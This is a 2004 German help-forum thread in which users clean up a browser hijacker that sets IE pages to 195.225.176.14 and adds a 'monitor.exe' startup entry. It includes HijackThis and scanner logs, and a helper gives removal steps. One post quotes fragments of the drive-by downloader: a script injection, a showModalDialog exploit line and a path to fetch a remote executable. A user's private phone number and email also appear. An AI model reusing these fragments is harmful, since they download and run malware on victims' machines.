monitor.exe ist nicht vorhandenoder verweist auf kein verzeichnis

#0
19.06.2004, 23:32
chrisi
zu Gast
#1 HILFE! Bekomme beim hochfahren diese meldung -der pfad monitor.exe ist nicht vorhanden oder verweist auf kein verzeichnis
was kann ich dagegen machen, virenscans haben nix gebracht, bzw haben welche erkannt und zerstört, alles systeme laufen, cpu auslastung normal
wer weiß was

direkte seitenangaben sind nurnoch mit http://
davor möglich, das war ein problem, nachdem adaware dies fand und behob ging es wieder normal, nun noch diese meldung der pfad monitor.exe ist.......

hier mein logfile

Logfile of HijackThis v1.97.7
Scan saved at 23:19:13, on 18.06.2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Programme\Gemeinsame Dateien\Symantec Shared\ccEvtMgr.exe
C:\Programme\Norton AntiVirus\navapsvc.exe
C:\WINDOWS\htpatch.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\HP\KBD\KBD.EXE
C:\Programme\ATI Technologies\ATI Control Panel\atiptaxx.exe
C:\Programme\Winamp3\winampa.exe
C:\Programme\Gemeinsame Dateien\Symantec Shared\ccApp.exe
C:\Programme\PicoZip\PicoZipTray.exe
C:\Programme\SAGEM\SAGEM F@st 800-840\dslmon.exe
C:\Programme\FinePixViewer\QuickDCF.exe
C:\WINDOWS\PCHEALTH\HELPCTR\Binaries\helpctr.exe
C:\WINDOWS\PCHealth\HelpCtr\Binaries\HelpSvc.exe
C:\WINDOWS\PCHealth\HelpCtr\Binaries\HelpHost.exe
C:\Programme\Internet Explorer\iexplore.exe
C:\Dokumente und Einstellungen\Eigene Dateien\Software\HijackThis.exe
C:\Programme\Messenger\msmsgs.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://google.de/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://195.225.176.14/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://195.225.176.14/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://195.225.176.14/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://de7.hpwis.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,Shellnext = http://de7.hpwis.com/
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Programme\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Programme\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [HTpatch] C:\WINDOWS\htpatch.exe
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [KBD] C:\HP\KBD\KBD.EXE
O4 - HKLM\..\Run: [ATIPTA] C:\Programme\ATI Technologies\ATI Control Panel\atiptaxx.exe
O4 - HKLM\..\Run: [StorageGuard] "C:\Programme\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [WinampAgent] "C:\Programme\Winamp3\winampa.exe"
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\System32\\NeroCheck.exe
O4 - HKLM\..\Run: [WinDSL MTU-Adjust] WinDSL_MTU.exe
O4 - HKLM\..\Run: [ccApp] "C:\Programme\Gemeinsame Dateien\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [ccRegVfy] "C:\Programme\Gemeinsame Dateien\Symantec Shared\ccRegVfy.exe"
O4 - HKLM\..\Run: [REGSHAVE] C:\Programme\REGSHAVE\REGSHAVE.EXE /AUTORUN
O4 - HKCU\..\Run: [MSMSGS] "C:\Programme\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [PicoZip] C:\Programme\PicoZip\PicoZipTray.exe
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [monitor] Explorer.exe monitor.exe
O4 - Global Startup: DSLMON.lnk = C:\Programme\SAGEM\SAGEM F@st 800-840\dslmon.exe
O4 - Global Startup: Exif Launcher.lnk = ?
O14 - IERESET.INF: START_PAGE_URL=http://de7.hpwis.com
O16 - DPF: {19E28AFC-EAE3-4CE5-AC83-2407B42F57C9} (MSSecurityAdvisor Class) - http://download.microsoft.com/download/0/5/c/05c905f4-dd30-427d-a3de-373c3e5552fc/msSecAdv.cab?1087508194406
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{6A6A3C85-8FEA-438C-8BDF-72354B2AAE0F}: NameServer = 62.27.27.62 62.27.53.66
Seitenanfang Seitenende
20.06.2004, 13:52
Ehrenmitglied
Avatar Sabina

Beiträge: 29434
#2 Lade TuneUp 2003 ...30 Tage free und checke den Comp.
http://www.tuneup.de/download/tu2003/
MfG
Sabina
__________
MfG Sabina

rund um die PC-Sicherheit
Seitenanfang Seitenende
20.06.2004, 17:27
Member

Beiträge: 13
#3 Liebe Sabina

Ich habe auch dieses Problem. Ich weiss aber nicht, wie ich meinen
Computer mit TuneUp checken soll. Kannst Du mir da helfen bzw. gibt
es da eine Telefonnummer, wo ich anrufen kann ?

Zur Sache selbst : Ich habe im Start 2 Fenster. Das obige habe ich
dadurch wegbekommen, indem ich in der Registry folgenden Key 'monitor'
(Ergebnis der Suche nach 'monitor.exe') gelöscht habe.

[HKEY_USERS\S-1-5-21-5725110-295985826-3232857373-1005\Software\Microsoft\Windows\CurrentVersion\Run]

Der Key 'monitor' in

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

wurde offensichtlich damit automatisch mitgelöscht, denn als ich dann das
zweite Vorkommnis auch löschen wollte, war er dann nicht mehr da.

Doch im Start bekomme ich noch eine zweite Meldung :

-------------------------------------------------------------------------
"monitor.exe" konnte nicht gefunden werden. Stellen Sie sicher, dass Sie den
Namen korrekt eingegeben haben und wiederholen Sie den Vorgang.
Klicken Sie auf "Start" und anschliessend auf "Suchen", um eine Datei zu
finden.
-------------------------------------------------------------------------

Kannst Du bzw. wer kann mir da helfen.

Ein monitor.exe habe ich tatsächlich in meinen Temporary Internet Files
gefunden - und dort war auch ein Javascript File shscr.js, in dem die Zeile
war :

var GetPath="http://195.225.176.14/sur/bwkmwbo/aisemex/orxajhx/dd/monitor.exe";

Das Script wurde von einem weiteren Javascript shcr_load.js aufgerufen :

myiframe.document.write("<SCRIPT SRC='http://195.225.176.14/sur/bwkmwbo/aisemex/orxajhx/shscr.js'><\/SCRIPT>");

Dieses Script habe ich aufgerufen gesehen in einem File inst.htm :

showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://195.225.176.14/sur/bwkmwbo/aisemex/orxajhx/shcr_load.js\\'><\/script>'";


'http://195.225.176.14 war auch eine kurze Zeit plötzlich meine Homepage.
Wer ist eigentlich http://195.225.176.14 ?

Kannst Du bzw. wer kann mir da helfen.

Mit freundlichen Grüßen

Werner
Seitenanfang Seitenende
20.06.2004, 18:06
chrisi
zu Gast

Themenstarter
#4 grüß dich werner!
war bei mir genauso, das 'http://195.225.176.14 meine homepage war, und ich auch keine adressen mehr eingeben konnte, mit adaware 6.0 ging dieses problem weg, aber die meldung ist weiterhin nach dem hochfahren dort--

"der pfad monitor.exe ist nicht vorhanden oder verweist auf kein verzeichnis"
gruß
chrisi

ps wie hast du die obige fehlermeldung wegbekommen?
ich check das nicht
Dieser Beitrag wurde am 20.06.2004 um 18:12 Uhr von chrisi editiert.
Seitenanfang Seitenende
20.06.2004, 19:34
Member

Beiträge: 13
#5 Lieber Chris

Deine Fehlermeldung habe ich durch das Löschen eines Keys in der
Registry wegbekommen - wie in meinem Beitrag beschrieben :

---------------------------
Das obige habe ich
dadurch wegbekommen, indem ich in der Registry folgenden Key 'monitor'
(Ergebnis der Suche nach 'monitor.exe') gelöscht habe.

[HKEY_USERS\S-1-5-21-5725110-295985826-3232857373-1005\Software\Microsoft\Windows\CurrentVersion\Run]

Der Key 'monitor' in

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

wurde offensichtlich damit automatisch mitgelöscht, denn als ich dann das
zweite Vorkommnis auch löschen wollte, war er dann nicht mehr da.
---------------------------

Nur die zweite Meldung - wie bekomme ich die weg ? Der Start meines
Rechners dauert dadurch ca. 25 Sekunden länger.

-------------------------------------------------------------------------
"monitor.exe" konnte nicht gefunden werden. Stellen Sie sicher, dass Sie den
Namen korrekt eingegeben haben und wiederholen Sie den Vorgang.
Klicken Sie auf "Start" und anschliessend auf "Suchen", um eine Datei zu
finden.
-------------------------------------------------------------------------

Und wie bekäme ich Adaware und wie müßte ich es bedienen ?

Mit freundlichen Grüßen

Werner
Seitenanfang Seitenende
20.06.2004, 20:13
chrisi
zu Gast

Themenstarter
#6 ja werner!
ich hab es gelesen, nur ich finde es nicht in suchen und wo ist Registry?
ich bin nicht so der freak, kannst du es in laiensprache mal erklären, danke!

hier downloaden
http://www.chip.de/downloads/c_downloads_8833064.html
mit den 25 sek war bei mir genauso.
gruß
chrisi
bedienung erlärt sich von selbst, einfach installieren und den rechner prüfen
Dieser Beitrag wurde am 20.06.2004 um 20:16 Uhr von chrisi editiert.
Seitenanfang Seitenende
21.06.2004, 00:33
Member

Beiträge: 13
#7 Lieber Chris

Besten Dank für Deinen Tip. Ich habe zwar nach dem versauten Sonntag
immer noch ein flaues und ausgesprochen komisches Gefühl im Magen, aber
nun ist mein Rechner auch ohne die zweite Fehlermeldung und sofort
hochgekommen.

Nun zu Deiner Frage :

Gehe zu : Start -> Ausführen
Tippe folgendes Kommando ein : regedit

Damit startest Du den Registry Editor !!!

In einer Baumstruktur liegt Dir hier die Windows Registry vor, bei der
viele Programme Einträge hinterlassen. Gehe nun diesen Baum abwärts zu

HKEY_USERS\S-1-5-21-5725110-295985826-3232857373-1005\Software\Microsoft\Windows\CurrentVersion\Run

Dort habe ich einen Key 'monitor' gefunden und gelöscht (rechte Maustaste
-> löschen).

Wenn Du Dir noch den Wert anschaust, den der zu löschende Schlüssel hat,
dann habe ich gesehen : Explorer monitor.exe

Wenn Du dieses Kommando in einer Shell (Du bekommst diese
mit Start -> Ausführen -> cmd) eintippst und mit RETURN abschickst, so
solltest Du genau Deine Fehlermeldung in einem Fenster sehen.

Gehe dann zu

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Sollte der Key da sein, dann lösche ihn ebenfalls.
Es sieht danach aus, als ob Windows alles unter dem Run Schlüssel im
Hochlauf startet.

Ich hoffe, das war verständlich genug. Solltest Du dann noch Fragen
haben, so kannst Du mich gerne unter (0175) 7210681 anrufen bzw. mir
unter Werner.Voelk@t-online.de eine Mail schicken.

Es würde mich auch ausgesprochen freuen, von Dir eine 'Frohbotschaft'
in irgendeiner Form zu hören.

Alles Gute

Werner
Seitenanfang Seitenende
21.06.2004, 08:15
Ehrenmitglied
Avatar Sabina

Beiträge: 29434
#8 Hallo ihr zwei,
Ladet bitte das HijackThis, scannen, save und dann ins Forum kopieren.
Es sieht nach Virus und Hijacker aus.
http://board.protecus.de/t9391.htm

Fuer den TuneUp 2003 muss man nur seine mail eingeben und dann wird man auf die Seite weitergeleitet, wo man es laden kann.
http://www.tuneup.de/download/tu2003/

MfG
Sabina
__________
MfG Sabina

rund um die PC-Sicherheit
Seitenanfang Seitenende
21.06.2004, 11:07
Member

Beiträge: 13
#9 Liebe Sabina

HijackThis hat mir folgendes Log ausgespuckt :

---------------------------------------------------------------
Logfile of HijackThis v1.97.7
Scan saved at 10:58:00, on 21.06.2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\GEARSec.exe
C:\Programme\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\LEXPPS.EXE
C:\Norman\NVC\BIN\Zanda.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\Programme\PowerQuest\Drive Image 7.0\Agent\PQV2iSvc.exe
C:\WINDOWS\Explorer.EXE
C:\NORMAN\Nvc\BIN\nipsvc.exe
C:\NORMAN\Nvc\BIN\NJEEVES.EXE
C:\NORMAN\Nvc\BIN\nvcoas.exe
C:\NORMAN\Nvc\BIN\NVCSCHED.EXE
C:\Programme\Ahead\InCD\InCD.exe
C:\Programme\Gemeinsame Dateien\Microsoft Shared\Works Shared\WkUFind.exe
C:\NORMAN\Nvc\BIN\ZLH.EXE
C:\PROGRA~1\T-DSLS~1\SpeedMgr.exe
C:\Programme\T-Online\T-Online_Software_5\Basis-Software\Basis1\ToADiMon.exe
C:\Programme\Gemeinsame Dateien\Real\Update_OB\realsched.exe
C:\NORMAN\Nvc\BIN\NYMSE.EXE
C:\NORMAN\Nvc\BIN\NIP.EXE
C:\Programme\Winamp\winampa.exe
C:\Programme\PestPatrol\PPMemCheck.exe
C:\Programme\PestPatrol\PPControl.exe
C:\Programme\PestPatrol\CookiePatrol.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Programme\Messenger\msmsgs.exe
C:\Programme\Siemens\Gigaset WLAN Adapter 54\WLANMonitor2003.exe
C:\Programme\InterVideo\Common\Bin\WinCinemaMgr.exe
C:\NORMAN\Nvc\BIN\cclaw.exe
C:\Programme\T-DSL SpeedManager\tsmsvc.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\WINDOWS\System32\taskmgr.exe
C:\Programme\Outlook Express\msimn.exe
C:\Programme\Internet Explorer\IEXPLORE.EXE
C:\Programme\T-Online\T-Online_Software_5\Basis-Software\Basis2\kernel.exe
C:\Programme\T-Online\T-Online_Software_5\Basis-Software\Basis2\sc_watch.exe
C:\Dokumente und Einstellungen\Werner Voelk\Lokale Einstellungen\Temporary Internet Files\Content.IE5\EHC7QXI5\HijackThis[1].exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://195.225.176.14/
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.klettersteig.com/klett1/default.htm
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://195.225.176.14/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://195.225.176.14/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://195.225.176.14/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://195.225.176.14/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://195.225.176.14/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://195.225.176.14/
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://195.225.176.14/ie
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://195.225.176.14/ie
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [InCD] C:\Programme\Ahead\InCD\InCD.exe
O4 - HKLM\..\Run: [Microsoft Works Update Detection] C:\Programme\Gemeinsame Dateien\Microsoft Shared\Works Shared\WkUFind.exe
O4 - HKLM\..\Run: [Norman ZANDA] C:\NORMAN\Nvc\BIN\ZLH.EXE /LOAD /SPLASH
O4 - HKLM\..\Run: [PinnacleDriverCheck] C:\WINDOWS\System32\PSDrvCheck.exe -CheckReg
O4 - HKLM\..\Run: [T-DSL SpeedMgr] "C:\PROGRA~1\T-DSLS~1\SpeedMgr.exe"
O4 - HKLM\..\Run: [ToADiMon.exe] C:\Programme\T-Online\T-Online_Software_5\Basis-Software\Basis1\ToADiMon.exe -TOnlineAutodialStart
O4 - HKLM\..\Run: [TkBellExe] "C:\Programme\Gemeinsame Dateien\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [WinampAgent] C:\Programme\Winamp\winampa.exe
O4 - HKLM\..\Run: [PPMemCheck] C:\Programme\PestPatrol\PPMemCheck.exe
O4 - HKLM\..\Run: [PestPatrol Control Center] C:\Programme\PestPatrol\PPControl.exe
O4 - HKLM\..\Run: [CookiePatrol] C:\Programme\PestPatrol\CookiePatrol.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Programme\Messenger\msmsgs.exe" /background
O4 - Global Startup: Adobe Gamma Loader.lnk = ?
O4 - Global Startup: Gigaset WLAN Adapter Monitor.lnk = C:\Programme\Siemens\Gigaset WLAN Adapter 54\WLANMonitor2003.exe
O4 - Global Startup: InterVideo WinCinema Manager.lnk = C:\Programme\InterVideo\Common\Bin\WinCinemaMgr.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Programme\Microsoft Office\Office10\OSA.EXE
O13 - DefaultPrefix: http://195.225.176.14/pre.pl?
O13 - WWW Prefix: http://195.225.176.14/pre.pl?
O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} (RdxIE Class) - http://software-dl.real.com/29baae4b77d3b6c2c018/netzip/RdxIE601_de.cab
---------------------------------------------------------------

Die Einträge http://195.225.176.14 scheinen mir jedenfalls von meiner
gestrigen Erfahrung zu sein. Wie müßte ich jetzt weiter verfahren - die
Registry Einträge ändern oder löschen oder ???

Das TuneUp habe ich zwar auf meinen Rechner bekommen, aber ich
weiß nicht, was ich damit anfangen bzw. wie ich es bedienen soll.

Danke auch Dir für Deine Hilfe.

Werner
Seitenanfang Seitenende
21.06.2004, 11:23
Ehrenmitglied
Avatar Sabina

Beiträge: 29434
#10 @Werner Voelk

scanne mit dem HijackThis, dann hake an, was ich poste und \fix\

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://195.225.176.14/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://195.225.176.14/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://195.225.176.14/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://195.225.176.14/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://195.225.176.14/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://195.225.176.14/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://195.225.176.14/
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://195.225.176.14/ie
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://195.225.176.14/ie
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/
O13 - DefaultPrefix: http://195.225.176.14/pre.pl?
O13 - WWW Prefix: http://195.225.176.14/pre.pl?
O4 - HKLM\..\Run: [TkBellExe] "C:\Programme\Gemeinsame Dateien\Real\Update_OB\realsched.exe" -osboot


neustarten

Lade von dieser Site folgende Programme
http://www.trojaner-info.de/anleitungen/hijackthis/about_blank.html
AdAware...free
Saerch\Destroy
CWHredder
Sphjfix.exe

Dann scannst du mit allen Tools ohne Internetverbindung

Dann laedst du Spyhunter und scannst ebenfalls
http://www.spy-bot.net/manual.asp

Dann gehst du in \InternetOptionen und loescht dort die Temporäre Internetdateien

# Doppelklicken Sie in der Systemsteuerung auf Internetoptionen.
# Klicken Sie auf die Registerkarte Allgemein, und klicken Sie danach unter Temporäre Internetdateien auf Dateien löschen.

dann lade die mwav.exe..30 Tage free.\alle Dateien scannen\
http://www.mwti.net/antivirus/free_utilities.asp
poste. ob der Scanner was gefunden hat.

.........................................................................................................
P.S. mit dem TuneUp kannst du das System saeubern, optimieren ...stelle immer\emfohlene Einstellungen \ein.
es gibt eine Funktion...System auf Fehler ueberpruefen...Pfadfehler sind auch dabei...

Du kannst auch noch den RegistryCleaner laden...30 Tage free
das Tool checkt ebenfalls Pfadfehler u.a.
http://www.registry-cleaner.net/bho-manager.htm

Lade dann noch den Firefox als Zweit und SurfBrowser...ist hijackerfrei.
Stelle eine Startseite ein und surfe nur mit ihm
http://www.firebird-browser.de/

dann poste das Log noch einmal.

MfG
Sabina
__________
MfG Sabina

rund um die PC-Sicherheit
Dieser Beitrag wurde am 21.06.2004 um 11:32 Uhr von Sabina editiert.
Seitenanfang Seitenende
21.06.2004, 13:52
Member

Beiträge: 13
#11 Liebe Sabina

Hier schicke ich die Logs, die ich bisher habe machen können (ich
muß jetzt doch auch in die Arbeit ...)

------------------------------ SPhjFix -----------------------


21.06.2004 12:13:21 SPhjFix started v1.07
21.06.2004 12:13:21 Stealth-String not found -> Programm terminated

------------------------------ CWShredder -----------------------


CWShredder v1.59.0 scan only report
Please understand that a CWShredder 'Scan only' report
might not be sufficient to troubleshoot an infected system.
You can use HijackThis for that:
http://www.merijn.org/files/hijackthis.zip
http://www.spywareinfo.com/~merijn/files/hijackthis.zip

Windows XP (5.01.2600 SP1)
Windows dir: C:\WINDOWS
Windows system dir: C:\WINDOWS\system32
AppData folder: C:\Dokumente und Einstellungen\Werner Voelk\Anwendungsdaten
Username: Werner Voelk

Found Hosts file: C:\WINDOWS\system32\drivers\etc\hosts (873 bytes, A)
Shell Registry value: HKLM\..\WinLogon [Shell] Explorer.exe
UserInit Registry value: HKLM\..\WinLogon [UserInit] C:\WINDOWS\system32\userinit.exe,
Found Win.ini file: C:\WINDOWS\win.ini (575 bytes, A)
Found System.ini file: C:\WINDOWS\system.ini (231 bytes, A)

- END OF REPORT -

------------------------------ Search & Destroy -----------------------


MediaPlex: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done)


Advertising.com: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done)


Advertising.com: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done)


Alexa Related: What's related link (Datei austauschen, nothing done)
C:\WINDOWS\Web\related.htm

Avenue A, Inc.: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done)


BFast: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done)


Commission Junction: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done)


CoolWWWSearch: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done)


DoubleClick: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done)


DSO Exploit: Data source object exploit (Registrierungsdatenbank-Änderung, nothing done)
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registrierungsdatenbank-Änderung, nothing done)
HKEY_USERS\S-1-5-21-5725110-295985826-3232857373-1005\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registrierungsdatenbank-Änderung, nothing done)
HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registrierungsdatenbank-Änderung, nothing done)
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registrierungsdatenbank-Änderung, nothing done)
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

HitBox: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done)


HitBox: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done)


HitBox: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done)


SpyHunter popups: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done)


ValueClick: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done)


WebTrends live: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done)



--- Spybot - Search && Destroy version: 1.3 ---
2004-05-12 Includes\Cookies.sbi
2004-05-12 Includes\Dialer.sbi
2004-05-12 Includes\Hijackers.sbi
2004-05-12 Includes\Keyloggers.sbi
2004-05-12 Includes\LSP.sbi
2004-05-12 Includes\Malware.sbi
2004-05-12 Includes\Revision.sbi
2004-05-12 Includes\Security.sbi
2004-05-12 Includes\Spybots.sbi
2004-05-12 Includes\Tracks.uti
2004-05-12 Includes\Trojans.sbi


------------------------------ Spyhunter -----------------------

Hat nichts gefunden.


------------------------------ mwav.exe (EScan AntiVirus (4.2.4) -----------------------

File C:\Dokumente und Einstellungen\Werner Voelk\Eigene Dateien\Hilfe\arc[1].htm infected by "Exploit.HTML.Mht" Virus. Action Taken: File Renamed.
File C:\Dokumente und Einstellungen\Werner Voelk\Eigene Dateien\Hilfe\shcr_load[1].js infected by "TrojanDownloader.JS.Small.d" Virus. Action Taken: File Deleted.
File C:\Programme\Pinnacle\Studio 8\OEM\hfx46studiosilent.exe tagged as not-a-virus:Tool.Win32.Reboot. No Action Taken.
File C:\RECYCLER\S-1-5-21-5725110-295985826-3232857373-1005\Dc77\Content.IE5\I5WV6TE5\arc[1].htm infected by "Exploit.HTML.Mht" Virus. Action Taken: File Renamed.
File C:\RECYCLER\S-1-5-21-5725110-295985826-3232857373-1005\Dc77\Content.IE5\U5CXCLCV\shcr_load[1].js infected by "TrojanDownloader.JS.Small.d" Virus. Action Taken: File Deleted.
File C:\RECYCLER\S-1-5-21-5725110-295985826-3232857373-1005\Dc78\Content.IE5\I5WV6TE5\arc[1].htm infected by "Exploit.HTML.Mht" Virus. Action Taken: File Renamed.
File C:\RECYCLER\S-1-5-21-5725110-295985826-3232857373-1005\Dc78\Content.IE5\U5CXCLCV\shcr_load[1].js infected by "TrojanDownloader.JS.Small.d" Virus. Action Taken: File Deleted.

------------------------------ ------------ -----------------------

Mit TuneUp bin ich da nicht so ganz klargekommen. Eine Funktion
'System auf Fehler ueberpruefen' habe ich nicht gesehen - oder meinst Du
die Funktionen DiskCleaner und RegistryCleaner.

Kannst Du aus diesen Logs etwas sehen ?

Herzlichen Dank

Werner
Seitenanfang Seitenende
21.06.2004, 16:32
Ehrenmitglied
Avatar Sabina

Beiträge: 29434
#12 @Werner Voelk
Ich sehe, dass die mwav.exe ziemlich viele Viren geloescht hat.
Besteht dein anfaengliches Problem noch immer??

SystemOptimizer,Carryout a Quick..... heisst die Funktion beim TuneUp.
Natuerlich kannst du auch die anderen Funktionen anwenden.
MfG
Sabina
__________
MfG Sabina

rund um die PC-Sicherheit
Dieser Beitrag wurde am 21.06.2004 um 16:59 Uhr von Sabina editiert.
Seitenanfang Seitenende
21.06.2004, 16:37
Ehrenmitglied
Avatar Sabina

Beiträge: 29434
#13 @chrisi, entschuldige, ich hatte dein Log nicht genau durchgearbeitet....

Fixe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://195.225.176.14/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://195.225.176.14/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://195.225.176.14/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://de7.hpwis.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,Shellnext = http://de7.hpwis.com/

O4 - HKCU\..\Run: [monitor] Explorer.exe monitor.exe

neustarten


gehe in den abgesicherten Modus
loesche die Explorer.exe monitor.exe in der Registry und unter Windows
HKCU\Microsoft\Windows\CurrentVersion\Run

